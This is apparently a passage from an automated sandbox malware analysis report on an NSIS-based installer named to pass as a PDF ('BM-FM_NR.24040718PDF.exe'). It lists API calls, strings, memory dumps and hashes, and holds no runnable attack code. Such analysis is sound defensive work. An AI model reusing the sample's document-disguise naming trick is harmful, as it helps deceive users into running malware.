                                                                      • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13469690913.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.13469666290.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000000.00000002.13469717075.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000000.00000002.13469744190.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                      • String ID:
                                                                      • API String ID: 3730416702-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                      • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13469690913.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                                      • GetMessagePos.USER32 ref: 00404836
                                                                      • ScreenToClient.USER32(?,?), ref: 00404850
                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                      • MulDiv.KERNEL32(0009DC8F,00000064,0009DE93), ref: 00402BC5
                                                                      • wsprintfA.USER32 ref: 00402BD5
                                                                      • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                      Strings
                                                                      • verifying installer: %d%%, xrefs: 00402BCF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: verifying installer: %d%%
                                                                      • API String ID: 1451636040-82062127
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                      • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                      • String ID:
                                                                      • API String ID: 2667972263-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(Dominique Setup: Installing,Dominique Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                      • wsprintfA.USER32 ref: 004047AF
                                                                      • SetDlgItemTextA.USER32(?,Dominique Setup: Installing), ref: 004047C2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s$Dominique Setup: Installing
                                                                      • API String ID: 3540041739-3437835362
                                                                      • Opcode ID: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                                      • Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                                      • Opcode Fuzzy Hash: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                                      • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetWindowTextA.USER32(00000000,Dominique Setup), ref: 00403A0C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: TextWindow
                                                                      • String ID: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"$1033$Dominique Setup$Dominique Setup: Installing
                                                                      • API String ID: 530164218-4136382539
                                                                      • Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                      • Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
                                                                      • Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                      • Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetDlgItem.USER32(?), ref: 00401CE2
                                                                      • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                      • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                                      • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                                      • Opcode Fuzzy Hash: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                                      • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401D3B
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                      • CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID:
                                                                      • API String ID: 3808545654-0
                                                                      • Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                      • Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
                                                                      • Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                      • Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                                      • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-3355392842
                                                                      • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                      • Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
                                                                      • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                      • Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                                      • GetTickCount.KERNEL32 ref: 00402C33
                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                      • String ID:
                                                                      • API String ID: 2102729457-0
                                                                      • Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                      • Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
                                                                      • Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                      • Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Dominique Setup,NSIS Error), ref: 00405D3C
                                                                        • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,76293410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                        • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                        • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                      • lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,76293410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
                                                                      • GetFileAttributesA.KERNEL32(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,76293410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76293410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 3248276644-3355392842
                                                                      • Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                      • Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
                                                                      • Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                      • Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00404EEB
                                                                      • CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
                                                                        • Part of subcall function 00403F60: SendMessageA.USER32(000103D4,00000000,00000000,00000000), ref: 00403F72
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                      • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                                      • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                      • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                      • CloseHandle.KERNEL32(?), ref: 004054F6
                                                                      Strings
                                                                      • Error launching installer, xrefs: 004054D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID: Error launching installer
                                                                      • API String ID: 3712363035-66219284
                                                                      • Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                      • Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
                                                                      • Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                      • Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,76293410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
                                                                      • GlobalFree.KERNEL32(0063C8B0), ref: 0040363B
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Free$GlobalLibrary
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 1100898210-3355392842
                                                                      • Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                      • Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
                                                                      • Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                      • Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,80000000,00000003), ref: 004057EE
                                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,80000000,00000003), ref: 004057FC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-3370423016
                                                                      • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                      • Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
                                                                      • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                      • Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                      • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                      • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13469690913.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                      • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                      • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                      • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
                                                                      • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                      • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                                      • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                      • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:0%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:100%
                                                                      Total number of Nodes:1
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 73915 36b22b90 LdrInitializeThunk

                                                                      Control-flow Graph

                                                                      control_flow_graph 2 36b234e0-36b234ec LdrInitializeThunk
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 50e902f38627c8bc5856e5356ae849d05261f225fcd27db9fcc44422b9a3cf80
                                                                      • Instruction ID: 055e29319d0086650beb119950f9ecd6a69a3aa803744433b1e2497da5a17ab1
                                                                      • Opcode Fuzzy Hash: 50e902f38627c8bc5856e5356ae849d05261f225fcd27db9fcc44422b9a3cf80
                                                                      • Instruction Fuzzy Hash: DB90023170610402D50061584624706200547D0201F71C816A1414528DD7A5895579A3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 1 36b22d10-36b22d1c LdrInitializeThunk
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 156152a113f26de045835593263fc8a0f390004c611cccad376ac1a76c52a9d3
                                                                      • Instruction ID: 8863a6458c9e0d21ed14b21645b50799aa108ab08e4e8f8b9635749dcca94e38
                                                                      • Opcode Fuzzy Hash: 156152a113f26de045835593263fc8a0f390004c611cccad376ac1a76c52a9d3
                                                                      • Instruction Fuzzy Hash: DE90023130200413D51161584614707100947D0241FA1C817A1414518DE6668956B522
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 0 36b22b90-36b22b9c LdrInitializeThunk
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 5714444c545c18ecc087abdc915546641166b6422022205f30f955e87b1e7311
                                                                      • Instruction ID: 23a5ce3c4dc7bdecbe16454c99b084cde61476fd32786499411139387f8bc1b8
                                                                      • Opcode Fuzzy Hash: 5714444c545c18ecc087abdc915546641166b6422022205f30f955e87b1e7311
                                                                      • Instruction Fuzzy Hash: AE90023130208802D5106158851474A100547D0301F65C816A5414618DD6A588957522
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-2160512332
                                                                      • Opcode ID: be4e2f4077e692ef601f8a188c49ac78f8dd1b775c156f1bf298318d177ee52e
                                                                      • Instruction ID: 894655007141d0f19bb4057a211035a46434cc1f6fe00bd2c3f02b88c76a039c
                                                                      • Opcode Fuzzy Hash: be4e2f4077e692ef601f8a188c49ac78f8dd1b775c156f1bf298318d177ee52e
                                                                      • Instruction Fuzzy Hash: EF925AB5A14351AFE721CE22C880F5AB7E8FB84758F10492DFA94D7290D778D844CF9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: $ $0
                                                                      • API String ID: 3446177414-3352262554
                                                                      • Opcode ID: 17bc186dbf9b9788eb1314a1cac79305d52a7c94cbb1c796c4a29f34e3d5a239
                                                                      • Instruction ID: be2c73e9a498f0522b107a1cf50fa3207515ca74cb257c163003303baa559446
                                                                      • Opcode Fuzzy Hash: 17bc186dbf9b9788eb1314a1cac79305d52a7c94cbb1c796c4a29f34e3d5a239
                                                                      • Instruction Fuzzy Hash: 683211B5A083819FE750DF69C884B9BBBE5BF88348F00492EF59987250D774E948CF52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 36B85EDD
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 36B85B61
                                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 36B85604
